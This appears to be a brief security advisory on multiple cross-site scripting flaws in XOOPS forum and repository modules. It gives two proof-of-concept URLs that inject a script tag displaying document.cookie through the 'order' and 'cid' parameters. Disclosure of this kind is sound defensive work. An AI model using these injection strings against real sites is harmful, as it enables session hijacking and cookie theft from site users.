|
Xoops Multiple Cross-Site Scripting Vulnerabilities
No exploit is required. The following proof of concept URI are available: http://www.example.com/xoops/modules/newbb/edit.php?forum=1&topic_id=1&viewmode=flat&order=ASC%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/script%3E&post_id=1 http://www.example.com/xoops/modules/repository/comment_edit.php?com_itemid=1&com_order=0&com_mode=flat&cid=1&cid=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/script%3E&com_id=1 |
|
|
Privacy Statement |